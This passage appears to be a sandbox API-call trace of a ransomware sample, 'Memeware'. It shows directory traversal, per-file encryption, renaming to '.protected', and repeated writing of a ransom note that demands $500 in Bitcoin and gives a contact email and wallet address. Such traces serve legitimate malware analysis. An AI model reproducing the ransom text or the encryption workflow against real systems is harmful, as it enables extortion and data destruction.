0x47ba90 [0084.801] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.801] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0084.801] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.802] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.802] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.802] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\.") returned 86 [0084.802] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.802] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.802] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.802] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.802] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.802] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.802] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.802] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.802] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.802] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.802] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.802] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\..") returned 87 [0084.802] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.802] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.802] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.802] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.802] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.802] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.802] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.802] lstrcmpiW (lpString1="3LKBQZJ3", lpString2="Windows") returned -1 [0084.802] lstrcmpiW (lpString1="3LKBQZJ3", lpString2="Program Files") returned -1 [0084.803] lstrcmpiW (lpString1="3LKBQZJ3", lpString2="Program Files (x86)") returned -1 [0084.803] lstrcmpiW (lpString1="3LKBQZJ3", lpString2="$Recycle.bin") returned 1 [0084.803] lstrcmpiW (lpString1="3LKBQZJ3", lpString2="System Volume Information") returned -1 [0084.803] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3") returned 93 [0084.803] lstrcmpW (lpString1="3LKBQZJ3", lpString2=".") returned 1 [0084.803] lstrcmpW (lpString1="3LKBQZJ3", lpString2="..") returned 1 [0084.803] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\*") returned 95 [0084.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.804] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.804] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.804] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.804] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.804] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.804] 
wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\.") returned 95 [0084.804] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.804] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.804] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.804] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.804] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\3lkbqzj3\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.804] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.804] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.804] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.804] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.804] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.804] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.804] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\..") returned 96 [0084.804] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.804] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0084.804] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.804] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.804] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.804] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.805] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.805] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.805] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\RESTORE_FILES.txt") returned 111 [0084.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\3lkbqzj3\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.805] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.805] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.806] lstrlenA (lpString="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") returned 684 [0084.806] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.806] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.806] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.806] CloseHandle (hObject=0x150) returned 1 [0084.806] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.806] lstrcmpiW (lpString1="8NES5H33", lpString2="Windows") returned -1 [0084.806] lstrcmpiW (lpString1="8NES5H33", lpString2="Program Files") returned -1 [0084.806] lstrcmpiW (lpString1="8NES5H33", lpString2="Program Files (x86)") returned -1 [0084.806] lstrcmpiW (lpString1="8NES5H33", lpString2="$Recycle.bin") returned 1 [0084.806] lstrcmpiW (lpString1="8NES5H33", lpString2="System Volume Information") returned -1 [0084.806] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33") returned 93 [0084.807] lstrcmpW (lpString1="8NES5H33", lpString2=".") returned 1 [0084.807] lstrcmpW (lpString1="8NES5H33", lpString2="..") returned 1 [0084.807] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\*") returned 95 [0084.807] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.807] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.807] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0084.807] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.807] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.807] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.807] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\.") returned 95 [0084.807] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.807] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.807] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.807] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.807] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.807] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.807] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.807] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.807] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.807] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.807] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.807] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\..") returned 96 [0084.807] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.808] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.808] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.808] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.808] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.808] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.808] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.808] lstrcmpiW (lpString1="get.adobe[1].xml", lpString2="Windows") returned -1 [0084.808] lstrcmpiW (lpString1="get.adobe[1].xml", lpString2="Program Files") returned -1 [0084.808] lstrcmpiW (lpString1="get.adobe[1].xml", lpString2="Program Files (x86)") returned -1 [0084.808] lstrcmpiW (lpString1="get.adobe[1].xml", lpString2="$Recycle.bin") returned 1 [0084.808] lstrcmpiW (lpString1="get.adobe[1].xml", lpString2="System Volume Information") returned -1 [0084.808] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml") returned 110 [0084.808] StrStrIW (lpFirst="get.adobe[1].xml", lpSrch=".protected") returned 0x0 [0084.808] lstrcmpW (lpString1="get.adobe[1].xml", lpString2="RESTORE_FILES.txt") returned -1 [0084.808] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.808] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x154 [0084.809] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml") returned 110 [0084.809] StrStrW (lpFirst="get.adobe[1].xml", lpSrch=".txt") returned 0x0 [0084.809] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml") returned 110 [0084.809] StrStrW (lpFirst="get.adobe[1].xml", lpSrch=".rar") returned 0x0 [0084.809] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml") returned 110 [0084.809] StrStrW (lpFirst="get.adobe[1].xml", lpSrch=".zip") returned 0x0 [0084.809] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0084.810] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffff3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.810] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0xd, lpOverlapped=0x0) returned 1 [0084.811] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.811] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.811] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) 
returned 1 [0084.811] CloseHandle (hObject=0x154) returned 1 [0084.812] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml.protected") returned 120 [0084.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\get.adobe[1].xml.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\get.adobe[1].xml.protected")) returned 1 [0084.813] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.813] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.813] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\RESTORE_FILES.txt") returned 111 [0084.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\8nes5h33\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.814] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.814] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.815] lstrlenA (lpString="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") returned 684 [0084.815] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.815] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.815] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.815] CloseHandle (hObject=0x150) returned 1 [0084.815] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.815] lstrcmpiW (lpString1="FKLUIDU0", lpString2="Windows") returned -1 [0084.815] lstrcmpiW (lpString1="FKLUIDU0", lpString2="Program Files") returned -1 [0084.815] lstrcmpiW (lpString1="FKLUIDU0", lpString2="Program Files (x86)") returned -1 [0084.815] lstrcmpiW (lpString1="FKLUIDU0", lpString2="$Recycle.bin") returned 1 [0084.815] lstrcmpiW (lpString1="FKLUIDU0", lpString2="System Volume Information") returned -1 [0084.815] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0") returned 93 [0084.815] lstrcmpW (lpString1="FKLUIDU0", lpString2=".") returned 1 [0084.815] lstrcmpW (lpString1="FKLUIDU0", lpString2="..") returned 1 [0084.815] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\*") returned 95 [0084.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.816] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
